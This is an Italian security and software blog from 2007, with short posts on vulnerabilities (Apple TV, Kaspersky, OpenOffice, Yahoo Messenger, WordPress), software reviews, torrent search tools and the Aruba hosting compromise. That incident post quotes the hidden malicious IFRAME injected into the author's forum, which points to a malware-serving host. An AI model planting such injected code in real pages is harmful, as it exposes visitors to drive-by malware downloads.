.:: Securnetwork.net Blog – Massimo Rabbi ::.

La polizia spagnola ha proceduto all’arresto di un 28enne sospettato di aver creato e distribuito un virus a più di 115.000 telefoni cellulari.
Le agenzie di stampa spagnola riportano che la polizia era sulle tracce del sospetto da ben 7 mesi.
Si tratta del primo arresto effettuato in Spagna con un’accusa di questo tipo.

Stando agli investigatori il virus infetta unicamente cellulari con il bluetooth attivato e che montano un sistema operativo Symbian.
Il virus sembra si diffondesse sotto forma di MMS dall’ipotetico contenuto erotico, o a seconda dei casi riportando informazioni sportive o addirittura del software antivirus.
La polizia ha affermato che gli effetti del virus hanno provocato danni per circa sette milioni di euro.

Siamo già quasi a quota 102.000 firme e credo sia importante diventino sempre di più, onde evitare di ridurci “all’italiana” anche sulla questione WiMax. Non credo sia il caso che le frequenze finiscano in mano ai “soliti noti.
I punti della petizione:

Oggi mentre cercavo un programmino che fosse un password manager, ma possibilmente “portable”, sono incappato in Keepass Password Safe.
Si tratta di un programmino veramente semplice da utilizzare e relativamente compatto, può stare tranquillamente anche in un floppy.
L’idea è quella di avere un gestore per tutte quelle passwords che utilizziamo negli ambienti più disparati, dall’homebanking alle mail, dai siti di e-commerce ai forum che frequentiamo.

La cosa carina di questo software è la presenza di svariati porting di cui una versione per dispositivi mobili: Windows Mobile 6 Classic & Professional, Windows Mobile 5.0 PocketPc & PhoneEdition, PocketPc 2003 (SE).
Ma non è tutto qui: di Keepass sono disponibili anche le versioni per Linux e MacOs X oltre che PalmOS.
Personalmente ho testato con successo che il file database delle passwords creato sotto Windows XP, funziona ed è accessibile anche dalla versione PocketPC.
Sul sito nella sezione downloads presenti anche i sorgenti delle varie versioni.
Ora non avete più scuse per non portare sempre con voi le vostre passwords in maniera completamente sicura!

Ricordate Bugmenot? Avevo parlato di questo sito verso la metà di aprile.
La sua utilità sta nel raccogliere una lista di possibili username/password per numerosi siti online, che molto spesso, solo per la lettura o download di contenuti richiedono una noiosa procedura di registrazione.
Bugmenot una volta inserito l’url del sito che stiamo visitando ci restituisce una lista di possibilità con corrispettiva percentuale di successo (che l’user e pass siano ancora valide).
Per rendere il nostro processo di “search & login” automatico è disponibile una estensione per Firefox scaricabile da qui.
In questo modo, una volta installata, se clicchiamo col tasto destro all’interno di un campo username o password e scegliamo dal menu contestuale la voce “Login with Bugmenot”, questi verranno riempiti con l’user/pass relativi al dominio.
Chiaro che la cosa funziona solo in quei siti per i quali è presente almeno una corrispondenza nell’archivio di Bugmenot.com, tuttavia val la pena sottolineare che questi sono molti e non solo stranieri

Oggi ho provato assieme a Matteo un software decisamente interessante: 12Voip.
Questo programmino si inserisce  a fianco dei tantissimi software dedicati al VOIP.
La cosa simpatica è la possbilità di effettuare chiamate in maniera gratuita dal proprio pc verso numeri fissi.
Il breve test è consistito in un paio di chiamate della durata di 3-4 minuti.
Un leggerissimo ritardo ma voce pulita e nessun particolare fruscio di fondo.
Testato anche con Relakks in funzione
Software quindi promosso!
Se vi va di fare una prova veloce questo è il sito di riferimento: 12Voip.

Oltre ad aggiungere il supporto per YouTube, la versione 1.1 di Apple TV chiude una falla piuttosto pericolosa. La vulnerabilità consentiva di effettuare code-injection e eseguire codice remoto sul device.
Il problema è causato da un bug nell’implementazione Apple dell’Internet Gateway Device Standardized Device Control Protocol, utilizzato dal dispositivo per segnalare, tra le altre cose, al router via UPnP quali porte aprire.
Sembra si verifichi un buffer overflow durante il processing di determinate pacchetti UPnP: questo consente di scrivere codice nello stack dell’applicazione e eseguirlo.
Stando all’advisory sembra la falla possa essere sfruttata da remoto: non è ancora chiaro però se quel “remoto” significhi dalla LAN interna oppure proprio da Internet.
Questo perchè tipicamente i pacchetti UPnP non vengono instradati attraverso Internet.
I problemi con il protocollo UPnP non sono di certo recenti: molto spesso sono stati riscontrati problemi nel supporto fornito dagli stessi router/firewall visto che non di rado capitava che venissero usati come relay o proxies in maniera “malevole”.
L’update viene installato in maniera automatica, anche se c’è da ricordare che il meccanismo di software update dell’Apple Tv è programmato per attivarsi una volta alla settimana. L’utente può tuttavia procedere all’aggiornamento in maniera manuale.

LINK:
- About the security content of Apple TV 1.1, Apple’s security advisory

In questi ultimi giorni sui blog e sui siti web più disparati, non si è fatto altro che parlare del massiccio attacco subito da numerosi siti web hostati su server Aruba.
Il modus operandi rispecchia in pieno  quanto avvenuto  lo scorso mese per i sistemi di Hosting Solutions.
L’intrusione ha infatti consentito a degli attacker di modificare le pagine web di svariati siti web inserendo un IFRAME che effettuasse il redirect degli utenti verso siti web contenenti malware.
Di seguito riporto il link a tre articoli che spiegano molto bene l’accaduto:
- Server Aruba sotto attacco, allarme in Italia
- Possibile intrusione nei sistemi Aruba
- L’italia sotto pesante attacco malware
Dalle cose lette qui e in altre pagine sembra sia stato sfruttato un tool automatizzato per lanciare attacchi malware: il software in questione è chiamato MPACK.
Panda Software ha pubblicato un interessantissimo report che analizza nel dettaglio questo tool: lo potete scaricare qui.

Il problema ha interessato direttamente anche noi di TechTown. In particolar modo è stato colpito il forum con risultante inserimento del seguente frammento IFRAME:
<iframe src=”http://zaq-home.org/x/index.php” width=”1″ height=”1″></iframe>
Del problema mi son accorto grazie alla segnalazione di Kaspersky Internet Security che ha prontamente bloccato il tentativo di download di due malware, nella fattispecie due Trojan.Downloader.

Acid ha rimosso il problema che sembra fosse dovuto ad una modifica nel campo templates del database del forum dove sembra sia stato aggiunto il codice, in particolare il board wrappers.
Abbiamo proceduto anche  ad una verifica dei file dell’intero ftp e cercato di verificare se tutto fosse funzionante.
Nel frattempo Aruba sembra non dire nulla a riguardo. Penso che una comunicazione via mail globale a tutti i propri utenti sarebbe stata cosa buona e giusta, per informare del possibile pericolo e del possibile coinvolgimento nell’attacco di questo o quel server anche in base alle tante segnalazioni degli utenti.
Il consiglio è quello di tenere sempre l’antivir aggiornato, meglio se di quelli che hanno la funzionalità integrata di web protection.

I vari prodotti di sicurezza della nota casa Kaspersky lavorano a stretto contatto col sistema operativo, impiegando un driver che tra le altre cose monitora anche le chiamate di sistema di Windows. Il controllo sul passaggio di parametri effettuato dal driver non sembra essere però corretto: ciò apre la porta a possibile attacchi che sfruttando dati non validi portano al crash del sistema.
Il security provider MatouSec, che ha segnalato il bug, lascia intendere che questa falla potrebbe essere ben più pericolosa di quanto sembri, alludendo a potenziali attacchi di tipo “code injection and execution“.

I prodotti di sicurezza molto spesso si “agganciano” alle funzioni di sistema con lo scopo di monitorare lo stato di funzionamento ed esecuzione di una macchina.
Mediante chiamate alla System Service Descriptor Table (SSDT) è possibile determinare quali programmi sono attivi sul computer e cosa stanno facendo: è possibile quindi prendere decisioni appropriate e interrompere per esempio l’esecuzione di un programma che abbia un comportamento “potenzialmente malevole”. Un’altra funzionalità importante è che questo consente di evitare che potenziale malware tenti di intaccare il comportamento dei software di sicurezza stessi.

Il driver klif.sys si aggancia a svariate syscalls tra cui NtCreateKey, NtCreateProcess, NtCreateProcessEx, NtCreateSection, NtCreateSymbolicLinkObject, NtCreateThread, NtLoadKey2, NtOpenKey e NtOpenProcess.
Se un programma effettua una chiamata ad una di queste funzioni con parametri non validi, il computer crasha e riparte.

Un interessante post su RootKit.com di EP_XoFF spiega questa vulnerabilità (presumibilmente piuttosto datata) usando la funzione NtOpenProcess.
Kaspersky ha reagito alle segnalazioni postando il proprio advisory di sicurezza e annunciando una patch che la compagnia distribuirà a breve tramite il sistema di automatic update.
Kaspersky ha classificato la minaccia come “low”, poichè richiede che un utente locale esegua il software malevole.
Stando all’advisory, la vulnerabilità non consentirebbe l’escalation di privilegi o l’esecuzione di codice esterno.
Le versioni interessate dal problema sembrano essere: Kaspersky Antivirus 6 e 7, Internet Security 6 e 7, Anti-Virus for Windows Workstations 6 e Anti-Virus 6 for Windows Servers, per sistemi operativi da Windows NT a Windows 2003. Sotto Windows Vista sembra che il famigerato crash di sistema non si verifichi.

Questo annunci conferma la crescente tendenza nella scoperta di bug che interessano software dedicati alla sicurezza. I bug scoperti negli antivirus di F-Secure, Grisoft e Avira (tra gli altri) sono legati a problemi di buffer overflows e format string vulnerabilities.
Questi fenomeni per la maggior parte sono da imputare il più delle volte ad una carenza per i dettagli durante la fase di programmazione.
Questo trend non lascia di certo ben sperare, è quindi auspicabile che ci sia un cambiamento di rotta, in virtù del fatto che software come personal firewall e antivirus sono la prima linea di difesa contro la diffusione su larga scala di malware e virus di ogni tipo.

LINKS:

HP ha scoperto delle vulnerabilità che interessano il suo software Help and Support Centre e che potrebbero consentire a utenti malevoli l’esecuzione di codice arbitrario sui sistemi, sfruttando pagine web infette.
La gravità del problema è che il software è installato di default su tutti i notebook HP e HP Compaq con sistema operativo Windows XP.
HP non da informazioni particolari in merito alla vulnerabilità, ma menziona soltanto il fatto che le pagine web possono essere usate per provocare un buffer overflow nell’ Help and Support Centre, consentendo di leggere e scrivere in maniera arbitraria files sulla macchina.
Tutte le versioni precedenti all’attuale 4.4C, che fixa il problema, sono interessate.
Gli utenti con un laptop HP dovrebbero verificare di aver o meno installato il programma e in caso affermativo, o disinstallarlo o aggiornarlo.
LINK:
- Help and Support Center, download e changelog sul sito HP

Il team di sviluppo di Debian ha rilasciato un advisory di sicurezza che spiega come un file rtf appositamente manipolato possa provocare un buffer overflow in OpenOffice e la possibile esecuzione di codice malevole. Il problema interessa tutte le piattaforme. Stando al FrSIRT, il bug è localizzato nella funzione SwRTFParser::ReadPrtData()all’interno del file filter/rtf/swparrtf.cxx.

Dopo un’iniziale incertezza circa quali versioni fossero affette dal problema, è stato stabilito che OpenOffice 2.2.1 fixa questa vulnerabilità. StarOffice è esente dal bug a partire dalla versione 8 update 7. Sono disponibili invece gli aggiornamenti per StarOffice 6 e 7.
Il problema con i file rtf non è l’unico, infatti il team di sviluppo di OpenOffice ha fixato una vulnerabilità di sicurezza che interessa i file dei caratteri (.ttf): il parsing da parte della libreria FreeType non avviene in maniera corretta.
File appositamente creati possono portare all’esecuzione di codice arbitrario.
Gli utenti sono quindi caldamente consigliati ad aggiornare a OpenOffice 2.2.1, nel frattempo la raccomandazione è di non aprire file rtf di provenienza sconosciuta.

LINKS:
- New OpenOffice.org packages fix arbitrary code execution, security advisory del Debian development team

Yahoo! ha aggiornato il proprio software per correggere i bugs di sicurezza scoperti nei giorni scorsi e di cui avevo già accennato in queste pagine: gli utenti sono quindi caldamente invitati a effettuare l’upgrade.
Nel frattempo l’autore dei due exploits ha pubblicato delle versioni riviste e correte, che potrebbero essere usate da script kiddies per costruire allo scopo in pochi click di mouse pagine web malevoli.
La versione aggiornata del programma fornita da Yahoo! rimpiazza i moduli ActiveX buggati ovvero ywcupl.dll e ywcvwr.dll. Nei prossimi giorni Yahoo! informerà in maniera automatica dell’aggiornamento tutti quelli che effettueranno in login al servizio, raccomandando l’update.

LINKS:
- Download Yahoo! Messenger Update
- Yahoo! Webcam ActiveX Controls, advisory di Yahoo
- Revised exploits by Danny su Full Disclosure

L’ultima versione del Kernel Linux, la 2.6.21.4, ripara tre vulnerabilità. La dereferenziazione di un null pointer in netfilter può comportare il crash del kernel in fase di processing di alcune connessioni. Questo bug può essere sfruttato in maniera remota.
Il secondo bug riguarda un problema nella funzione cpuset_tasks_read che consentirebbe a utenti loggati nel sistema di leggere parte della memoria del kernel: questo potrebbe comportare l’accesso a informazioni riservate e protette.
L’ultimo invece riguarda la poca sicurezza nel sistema di generazione  di numeri random in mancanza di una sorgente entropica.

LINK: Changelog for kernel 2.6.21.4, note su kernel.org

Alzi la mano chi non ha mai utilizzato siti come The Pirate Bay, Isohunt, Torrentz.com o Mininova per cercare qualche file musicale o programma appena uscito che magari attirava la nostra attenzione.
Bittorrent è sicuramente una “invenzione” che ha rivoluzionato il modo di scaricare e di condividere file.
Il problema di cercare quello che ci interessa molto spesso è risolto da siti come quelli citati sopra che indicizzano una quantità enorme di file .torrent relativi a musica, serie tv, ebook, programmi etc.etc.
In circolazione però ci sono anche software che permettono di effettuare una ricerca simultanea su più motori di ricerca on-line permettendo cosi’ di ottenere più risultati possibili, con probabilità più alta di trovare quello che cerchiamo.
Tempo fa Carlo mi suggerì di provare Torrent Harvester e devo dire che tutto sommato nn sono rimasto affatto deluso.
Il progetto per il momento sembra essere in una fase di “stagnazione”, almeno così pare visto che l’ultima versione disponibile sembra essere la 0.7b facilmente reperibile su SoftPedia o siti analoghi.
Sulla home page cliccando sulla voce status si ottiene il seguente messaggio:
“No general development work going on as yet. Currently as version 0.7b has just been released and I’m migrating the code to VS 2005 and .Net 2.0. Will be adding some new engines as the mood takes me.”
Un piccolo consiglio che posso dare è quello di modificare le impostazioni per l’update.
Cliccando su Help->Check for Updates il sito web impostato è ancora la vecchia home page http://TorrentHarvester.awardspace.com: basta quindi cambiare col nuovo indirizzo http://torrentharvester.007ihost.com.
Questo si rivela necessario perchè altrimenti l’aggiornamento dei vari engine fallisce.
Torrent Harvester tuttavia non si limita alla semplice ricerca di file .torrent. Il programma infatti permette di effettuare anche altri tipi di ricerca: ed2k, cracks, ftp, irc, generica, usenet. Naturalmente il numero di engines disponibili per queste ultime voci non è così elevato come per la ricerca torrent ma può comunque far comodo.  

Accanto a Torrent Harvester si va a posizionare anche un altro software Bit Che, la cui ultima versione disponibile la 1.0 build 59 risale al 10/12/2006.
Il software a differenza di Torrent Harvester non richiede il Framework .net per funzionare e dispone di un sistema di filtering decisamente migliore: permette di rimuovere torrent duplicati individuati su siti diversi, trovare torrent simili (potenziali duplicati) e individuare potenziali fakes. E’ possibile inoltre visualizzare una preview del torrent con i dettagli sul file si andrà eventualmente a scaricare.
Bit Che permette di cercare tra siti privati e pubblici. Ecco la lista:

Siti pubblici
* Piratebay.org
* Mininova.org
* TorrentSpy.com
* isohunt.com
* Mp3Nova.org
* NewTorrents.info
* btjunkie.org
* TorrentReactor.net
* TorrentBox.com
* TorrentPortal.com
* Snarf-it.org
* mybittorrent.com
* h33t.com
* SloTorrent.net
* BTMon.com
* iPodNova.net
* TodoTorrents.com (Spanish)
* ZeroTracker.com

Siti privati (necessaria registrazione)
* Demonoid.com
* Oink.me.uk (beta support)
* TorrentBytes.net
* DimeaDozen.org
* FileMP3.org
* FileList.org
* BitSoup.org
* MySpleen.com
* HDbits.org
* Araditracker.com
* Status-X.net
* IPTorrents.com
* DidiDave.com
* BitChile.com (Spanish)
* STMusic.org
* BitNation.com
* BlackCats-Games.net
* TheDVDClub.org
* Midnight-Torrents
* RevolutionTT.net
* SceneMachine
* Snarf-It.org (regged)
* Takeabyte.org
* TorrentBytes.net
* Torrents.bol.bg

Opinione personale è che valga la pena tenere installati entrambi i programmi, Torrent Harvester soprattutto per la grossa mole di engine (circa 180) sui quali puo’ effettuare le ricerche (e non solo torrent-related), Bit Che per la precisione della ricerca e caratteristiche di filtering.

LINKS:
- Bit Che Home Page
- Torrent Harvester Home Page

E’ stata rilasciata il 7 giugno la nuova versione del famoso software per la rimozione di spyware e malware di casa Lavasoft.
La nuova release targata Ad-Aware 2007 è disponibile in tre versioni: Free, Plus e Pro.

In breve le nuove caratteristiche più importanti:
- Engine di scansione completamente nuovo: più preciso e più performante
- Migliorata la tecnologia Code Sequence Identification (CSI) che identifica nuove possibili minaccie e malware nascosto
- Cambiamenti al sistema di update per risparmiare tempo e risorse
- Nuovo tool TrackSweep per cancellare le tracce lasciate durante la navigazione
- Supporto a diversi browser: Internet Explorer, Firefox, e Opera.
- Nuova interfaccia utente

Link: Ad-Aware 2007 Free

Da ieri sono ufficialmente “Relakks powered”
Espressione che sottointende il fatto che ho acquistato l’abbonamento mensile a Relakks.
Come riporta l’ottima guida pubblicata su P2PForum :
“Relakks e’ un servizio commerciale che tutela la tua privacy. Sponsorizzato dal Partito dei Pirati svedese, il servizio offre una VPN cifrata per rendere il proprio traffico anonimo. Detto in altre parole, il traffico internet in uscita dal nostro PC passa tutto (attraverso una connessione cifrata) per un server ad altissima velocita’ (senza limiti di banda) che poi lo redirige verso l’esterno, un po’ come farebbe un proxy. Il nostro ip di uscita non sara’ quello del nostro internet provider, bensi’ quello svedese...”
Questo giusto per darvi un’idea, fate cmq un salto a leggervi il topic che è veramente esplicativo.

Prima impressione personale: OTTIMO!
Ho effettuato il download di giga di dati per testing della velocità e la stabilità della connessione.
Nella giornata di ieri ho scaricato ben 3.5 – 4 GB di dati senza alcun tipo di interruzione e oggi ho replicato l’esperimento.
La banda è esattamente la stessa che fornisce l’ISP, nel mio caso Telecom Italia con l’abbonamento Alice 2mbit.
Ho effettuato un test anche con un file torrent da qualche centinaio di mega, una iso di Ubuntu Server 7.04 e tutto è filato per il meglio
Prossimo test sarà verificare come funziona Emule.
Son curioso di vedere se queste caratteristiche del servizio rimarrano tali per tutto l’arco del mese o se è soltanto un “effetto paradiso” dovuto ai primi giorni di iscrizione.
Per 6 euro direi che può essere interessante fare una prova… a voi la scelta

LINK: https://www.relakks.com/

Sul noto sito milw0rm è stato pubblicato ieri un exploit che sfrutta un bug del file xmlrpc.php della versione 2.2 di Wordpress.
La vulnerabilità è di tipo sql injection e sfrutta il mancato controllo su $args[4] quando si definisce la variabile $max_results.
La soluzione al problema è editare la riga 541 come segue:
$max_results = (int) $args[4];

Il codice dell’exploit in C# è disponibile qui.

Sul fatto che i controlli ActiveX siano una delle potenziali falle per software come Internet Explorer, non c’è dubbio.
Anche Yahoo! Messenger si ritrova a fare i conti con questo problema.
A quanto pare infatti i controlli Yahoo! Webcam Upload (ywcupl.dll) e Webcam Viewer (ywcvwr.dll) possono rivelarsi un veicolo di diffusione di malware. Un attaccante potrebbe sfruttare i bug di tipo buffer overflow che interessano i controlli ActiveX del software di messaggistica (versione Windows) per iniettare codice malevole.
Le vulnerabilità sono state confermate nella versione 8.1.0.249 di Yahoo! Messenger, ma anche altre potrebbero esserlo.
Nell’attesa del rilascio di una patch da parte di Yahoo! il consiglio per gli utenti è quello di disattivare i controlli.
Le due falle sono state ampiamente descritte dal white-hat hacker Danny, nella giornata di ieri, in un paio di post su una mailing list dedicata alla sicurezza (qui e qui).
Tuttavia già martedì, la nota casa eEye aveva annunciato la presenza di alcune falle in Yahoo! Messenger 8, tralasciando pero’ i dettagli.
Nonostante non ci sia ancora stata conferma è altamente probabile che i bugs descritti da Danny siano gli stessi segnalati il giorno prima da eEye.

A questo indirizzo http://www.usabilityviews.com/simply_google.htm si può trovare una lista completa ed esaustiva delle varie tecnologie e funzionalità messe in campo da Google che spaziano ben oltre la “semplice ricerca”.
Per molti infatti Google è IL motore di ricerca per antonomasia. In realtà come sappiamo Google non è solo questo.
Molte funzionalità possiamo ritrovarle linkate ad esempio nella pagina principale di Google Labs, ma non è tutto.
Simply Google è stato originariamente pensato da Chris McEvoy che aveva creato una pagina web con la raccolta di tutto quanto fosse legato in qualche modo a Google: dalle varie tipologie di ricerca (testo, immagini, finanza, directory, feeds etc.etc.) ai blog ufficiali, passando per i software e i siti ad esso correlati.
Tuttavia una lista più completa ed aggiornata è consultabile proprio qui ed è aggiornata a giugno 2007

Dopo aver installato con successo le ultime versioni di PHP e Apache può succedere che quando andiate a testare la classica pagina phpinfo.php vi dia come risultato pagina bianca.
Per prima cosa accertatevi che nel file httpd.conf siano presenti delle righe simili
#BEGIN PHP INSTALLER EDITS - REMOVE ONLY ON UNINSTALL
PHPIniDir "C:/Programmi/PHP/"
LoadModule php5_module "C:/Programmi/PHP/php5apache2_2.dll"
AddType application/x-httpd-php .php
#END PHP INSTALLER EDITS - REMOVE ONLY ON UNINSTALL

Fatto questo controllate come avete scritto il file phpinfo.php. Se come me, avete usato gli short tags ovvero:
<?
phpinfo();
?>

E’ allora altamente probabile che nel vostro file php.ini nella directory di PHP la variabile short_open_tag sia impostata ad Off.
Due sono allora le soluzioni:
1) utilizzate i tag “completi” ovvero:
<?php
...
?>
Soluzione questa caldamente consigliata per motivi di portabilità specie quando sviluppate librerie o in progetti piuttosto grossi.
2) Cambiate il valore della variabile a On o commentate la riga, per poter usare anche gli short tags se proprio non riuscite a farne a meno:
short_open_tag = On
Naturalmente dopo aver apportato le modifiche fate un bel restart di apache.

Sul sito di Apple sono recentemente comparsi 3 spot pubblicitari che preparano il lancio del tanto atteso iPhone.
Il link per vedere i video è questo: http://www.apple.com/iphone/ads/
Che dire, di certo un bel gioiellino!